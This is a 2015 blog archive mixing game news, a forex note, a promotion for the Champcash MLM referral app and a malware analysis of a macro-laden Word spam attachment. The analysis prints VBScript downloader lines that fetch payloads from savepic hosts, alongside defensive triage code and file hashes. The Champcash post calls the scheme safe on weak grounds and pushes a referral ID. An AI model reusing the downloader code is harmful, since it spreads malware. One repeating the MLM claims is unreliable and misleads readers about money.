Wednesday, 20 May 2015

Champcash: A New Way to Earn Good Money

What is ChampCash?


Champcash is the latest app for Android users to earn some extra bucks. It's like an MLM (Multi-Level Marketing) scheme, in which you make new members by sending them the link of the Champcash app. There is no fee to join this programme; instead, you have to install some apps suggested by Champcash to be eligible for earning.


Install Champcash Now

Is Champcash a Fraud?


I was also concerned about this thing when I first heard about Champcash. I searched for this issue on the internet but got nothing. So I concluded that it is not a fraud.

Try ChampCash

How does Champcash earn and provide incentive to its users?


Champcash gets money from various companies by getting their apps installed on the Android devices of users. Champcash distributes a certain percentage of its earnings through this MLM scheme. In this way people participate in it and the apps get installed on millions of Android smartphones. A number of MLM schemes are running all over the world (example – Amway). The majority of MLM schemes make good money for those who join at an initial stage. So don't wait and install Champcash on your Android device now.

Be a part of Champcash

How can you withdraw the amount from Champcash?


There are 2 ways to do so. If it's a small amount that you want to withdraw, then you can recharge any mobile with a minimum amount of $1. But if it's a large amount, then you can withdraw it using wire transfer or PayPal transfer. Mobile recharge is done instantly, while the second method takes at least a month to get the balance in your bank account. But such amounts are worth waiting for.

How to install Champcash and be eligible for earning?


Follow these steps to install Champcash on your Android smartphone.

  • Install Champcash
  • Open Champcash in your Phone and Signup
  • It may ask you for Sponsor ID / Refer ID. Enter 43718
  • Now it will give you a challenge to install some apps. "Accept the challenge". You might need to install 7 to 10 apps to complete the challenge. This is the toughest step, as it takes more than 100 MB of your mobile data and your time. You have to install these apps and then open them for at least 1 minute.
  • Once you complete the above step you will be eligible for earning.
  • Then you can invite your friends to be a part of this scheme.
  • On every successful joining you get $0.5 to $1.5, depending upon your country. You can earn up to 7 levels of joining, but your commission decreases as the depth of level increases. Still, it can earn you a few good bucks.

What's the real benefit of joining Champcash?


  • Your network works for you. You have to work only during the initial stage. Once some good users have joined under you then they will work for you automatically. Their referrals will automatically add commission in your account up to further several levels.
  • There is no limit for direct joining under you. So there is no limit to earning.
  • It turns your mobile phone into an earning machine.
  • Even if it doesn't make you a millionaire, it can earn you some extra money.
  • It's a good thing for those who work from home and have internet access on their Android smartphone.

Join Champcash Now and earn unlimited.


Wednesday, 13 May 2015

Limit Load, new arcade combat flight simulator

Stealth development might not be very "open-sourceish", but it sometimes makes for some nice surprises in our project showcase forum.

This time it was the completely new open-source game Limit Load, self-described as:
A cockpit flight game that is more of an arcade than a sim. The game is built on the Panda3D game engine. It is similar to the ancient games like the classic Wings or the very good Strike Commander. The story and the atmosphere are important elements of the game, so a lot of focus is placed on that too.
Here is some in-game action and it seems quite polished already for such a new game:


Licensing of assets is still a bit of a grey area it seems, but they are fully aware of it:
The game code is licensed under GPL 3, and custom-made game assets under CC-by-SA 4.0. Some of the assets were taken from "free" (as in "not sure in which way") sources on the Internet, so their licensing situation is unclear. Eventually these should be cleared for use or replaced.
So where is my VR kit? :D

Friday, 8 May 2015

New malicious Office docs trick


It all starts with the 1,000,000th usual spam mail in your inbox:

Have you received an order form? No.











The content is as follows:


Dear,

We have received your order form [AY19358KXN]  and we thank you very much. Our sales department informs us that they are able to dispatch your stock by the end of next week following your packing instructions.

As agreed, we have arranged transport. We are sending herewith a copy of our pro-forma invoice.

The consignment will be sent as soon as the bank informs us that the sum is available. We hope you will be satisfied with the fulfilment of this order and that it will be the beginning of a business relationship to our mutual benefit.


Attached is a DOC file with (surprise) a macro attached. However, the method is different from the usual:


In the past, there have been some other new tricks as well, for example:
  • Analyzing an MS Word document not detected by AV software
  • XML: A New Vector For An Old Trick
  • Malware authors go a step further to access bank accounts

With regard to any Office file, you can simply open it in a text editor such as Notepad++ and you'll see the .mso appended at the end. The new thing here is that it's a Word MHTML file with macro(s).
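A triage check for the container trick described above, as an added example that is not part of the original post or of olevba: it walks the MIME parts of a file that claims to be a .doc, flags any part whose decoded body starts with the ActiveMime header, and confirms that a zlib stream inside it inflates to an OLE container. The sample document, its file path and the scan-for-zlib-header approach are assumptions made for illustration.

```python
import base64
import email
import zlib

OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # OLE2 compound file signature
HEADER = b"ActiveMime"                          # start of a decoded .mso part


def unpack_activemime(blob: bytes):
    """Return the OLE container packed inside an ActiveMime blob, or None."""
    if not blob.startswith(HEADER):
        return None
    # The zlib stream's offset varies between samples, so try every position
    # that carries a zlib header byte (0x78) instead of one fixed offset.
    for off in range(len(HEADER), len(blob)):
        if blob[off] != 0x78:
            continue
        try:
            data = zlib.decompressobj().decompress(blob[off:])
        except zlib.error:
            continue
        if data.startswith(OLE_MAGIC):
            return data
    return None


def find_mso_parts(raw: bytes):
    """Return (Content-Location, OLE size) for each ActiveMime MIME part."""
    hits = []
    for part in email.message_from_bytes(raw).walk():
        if part.is_multipart():
            continue
        ole = unpack_activemime(part.get_payload(decode=True) or b"")
        if ole is not None:
            hits.append((part.get("Content-Location", "?"), len(ole)))
    return hits


def build_sample() -> bytes:
    """Constructed MHTML 'doc' whose .mso part wraps a placeholder OLE header."""
    mso = HEADER + b"\x00" * 40 + zlib.compress(OLE_MAGIC + b"\x00" * 64)
    b64 = base64.encodebytes(mso).decode()
    return ("MIME-Version: 1.0\n"
            'Content-Type: multipart/related; boundary="BOUND"\n\n'
            "--BOUND\nContent-Type: text/html\n\n<html>order form</html>\n"
            "--BOUND\nContent-Location: file:///C:/sample/editdata.mso\n"
            "Content-Transfer-Encoding: base64\n"
            "Content-Type: application/x-mso\n\n" + b64 +
            "--BOUND--\n").encode()
```

A hit on a file with a .doc extension is worth escalating on its own, since the extension hides the MHTML container from filters that only look for OLE or OOXML signatures.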

Using olevba (by @decalage2), we can extract and automatically decode the .mso object - which contains a bunch of (what appears to be) random gibberish:

Function that "Returns the character associated with the specified character code"






You can use the ASCII character code chart to figure out what this malware is doing exactly, for example the first line Chr$(104) & Chr$(116) & Chr$(116) & Chr$(112) is simply "HTTP".

Another option is to use a Python program made by Xavier Mertens, deobfuscate_chr.py.
You can find a Pastebin here with the extracted + deobfuscated macro.
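The manual ASCII-chart lookup above can be automated. The following is an added example, not Xavier Mertens' deobfuscate_chr.py and not code from the original post: it folds Chr()/ChrW() concatenations (decimal or &H hex arguments, mixed with string literals) back into plain string literals and then pulls out any URLs for an indicator list. The sample macro and its example.invalid host are constructed.

```python
import re

# One operand: Chr/ChrW/Chr$/ChrW$ with a decimal or &H hex argument, or a
# double-quoted VBA string literal ("" inside a literal is an escaped quote).
TERM = r'(?:ChrW?\$?\(\s*(?:&H[0-9A-F]+|\d+)\s*\)|"(?:[^"]|"")*")'
# One or more operands joined by & or + (line continuations are not handled).
CHAIN = re.compile(rf'{TERM}(?:\s*[&+]\s*{TERM})*', re.IGNORECASE)
CHR_CALL = re.compile(r'ChrW?\$?\(\s*(&H[0-9A-F]+|\d+)\s*\)', re.IGNORECASE)
URL = re.compile(r'https?://[^\s"<>]+', re.IGNORECASE)


def decode_term(term: str) -> str:
    """Turn one Chr() call or string literal into its plain text."""
    call = CHR_CALL.fullmatch(term)
    if call is None:
        return term[1:-1].replace('""', '"')
    arg = call.group(1)
    code = int(arg[2:], 16) if arg[:2].upper() == "&H" else int(arg)
    return chr(code) if code <= 0x10FFFF else term


def fold_chr_chains(source: str) -> str:
    """Collapse every Chr()/literal concatenation into one string literal."""
    def repl(match):
        terms = re.findall(TERM, match.group(0), re.IGNORECASE)
        text = "".join(decode_term(t) for t in terms)
        return '"' + text.replace('"', '""') + '"'
    return CHAIN.sub(repl, source)


def extract_urls(source: str) -> list:
    """Return URLs that only become visible after folding (for IoC lists)."""
    return URL.findall(fold_chr_chains(source))


# Constructed sample in the style the post describes; the host is a placeholder.
SAMPLE_MACRO = '''Sub AutoOpen()
    u = Chr$(104) & Chr$(116) & Chr$(116) & Chr$(112) & Chr(58) & ChrW(&H2F) & "/example.invalid" & Chr(47) & "x"
    ext = chr(46) + CHRW$(&h76) & "bs"
End Sub'''

if __name__ == "__main__":
    print(fold_chr_chains(SAMPLE_MACRO))
    print(extract_urls(SAMPLE_MACRO))
```

Run it over the macro source that olevba extracts; variables spliced between the Chr() calls are left in place, so partially folded lines still show which pieces are computed at run time.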


Short analysis of this .doc file using olevba












Other tools are available as well, for example oledump and emldump from Didier Stevens.

Emldump + passing through oledump extracted a malicious link











 
Now, what happens when you execute this malicious Word file?

Oops, seems macros are disabled :)







If macros are enabled, or you choose to enable the macro in that document, a Pastebin download link is opened and the file is executed. The process flow is:

Word document -> download VBS from Pastebin -> Execute VBS -> Downloads & executes EXE file -> Downloads & executes another EXE file.

Visually, you might get either of these images:

dim JHyygUBjdfg: Set JHyygUBjdfg = createobject("Microsoft.XMLHTTP")
dim jhvHVKfdg: Set jhvHVKfdg = createobject("Adodb.Stream")
JHyygUBjdfg.Open "GET", "http://savepic.org/7260406.jpg"
















dim sdfsdfsdf: Set sdfsdfsdf = createobject("Microsoft.XMLHTTP")
dim dsfsdfsdfg: Set dsfsdfsdfg = createobject("Adodb.Stream")
sdfsdfsdf.Open "GET", "http://savepic.net/6856149.jpg"












Dropper, payload, related files:

AY19358KXN.doc (original file)
SHA1: b2c793b1cf2cf11954492fd52e22a3b8a96dac15
VirusTotal

Extracted macro (I named it AY.vb)
SHA1: 79b0d7a7fe917583bc4f73ce1dbffc5497b6974d
VirusTotal

JGuigbjbff3f.vbs (dropped VBscript file)
SHA1: c8a914fdc18d43aabbf84732b97676bd17dc0f54
VirusTotal
Deobfuscated VBscript

o8237423.exe (dropper)
SHA1: 7edc7afb424e6f8fc5fb5bae3681195800ca8330
VirusTotal

DInput8.dll (payload)
SHA1: 8bfe59646bdf6591fa8213b30720553d78357a99
VirusTotal





Prevention



Conclusion

It seems obvious that malware authors are keeping up-to-date with the latest news and as such adapting their campaigns as well. Better be safe than sorry and don't trust anything sent via email. ;-)

If you're in an organisation, you might want to consider blocking the execution of all macros (or only allow the ones that are digitally signed if there's really no other choice) by using GPO.

You can find those templates here:

Note: starting from Office 2010, macros are disabled by default.


Resources


Thursday, 7 May 2015

Old school 2D RTS Wyrmsun is looking to be greenlit

We were kindly made aware by the main developer of the 2D RTS Wyrmsun that he is currently looking for support to get this game on the Steam platform (link includes a game-play video).

Here is a description of the game we got from him:
In Wyrmsun, humans, elves and dwarves all seek to carve a place for themselves on their different homeworlds, with humans living on Earth, dwarves dwelling on Nidavellir, and elves inhabiting Alfheim. In the game's missions, each world follows separate storylines, but the various civilizations can be mixed and matched in custom games.

Wyrmsun features:
  • Retro-style graphics
  • 2 playable civilizations, and a number of non-playable ones
  • 18 quests to play, earning technology points which can be used to obtain new units, buildings and technologies
  • 38 units, 30 buildings and 14 technologies
  • Units that can earn experience, being able to upgrade to new unit types or acquire new abilities upon level-up
  • Persistent heroes, who carry over their level and abilities throughout scenarios
  • Personal names and traits for units
  • Cave, Conifer Forest, Dungeon, Fairlimbed Forest and Swamp tilesets
  • 33 maps of real and fictional locations to choose from, as well as random maps
  • Living environment, with fauna reproduction and predation
  • Very moddable game, with mod-loading capability built in
  • Grand strategy mode, where production is resolved on the strategic (world map) level, while battles are resolved on the tactical level
  • In-game encyclopedia, allowing players to learn more about the units, buildings and other elements of the game, as well as their historical and mythological sources of inspiration.
For those more inclined to help out with the code, there are two code repositories: one for the game and one for the modified Stratagus engine.

P.S.: Yes, FOSS games can be on Steam as long as they don't integrate with closed-source Steam integration libraries, and it can be a great way to attract more users to your game and maybe even collect some donations or sell add-ons (preferably in a "release freely when sufficient funds are gathered" style). See this game for a successful example.

Sunday, 3 May 2015

AUS/USD Forex Report 4th MAY 2015

AUD Primary Cycles

The completion of the Break & Extend pattern from the 2014 lows into major support @ 7567 has provided a robust pattern for the AUD to continue to rise up into the 3-month highs.

That 3-month high is now 80.90 in MAY, and if it's going to continue higher then the support level becomes .7802-.7819 (Yearly lows and 3-month 50% level)

Above .8090 (resistance) and trend bias is to move back towards the 2015 50% level over the next 6 months.

In the short term, we have tomorrow's interest rate announcement, and if they drop rates then it could put pressure on the AUD once again.

However, last week's spike and retracement might have that already factored in, as the Reserve Bank leaked the news early.

Therefore don't be surprised to see the AUD move upwards after the news. (trade on the side of .7802)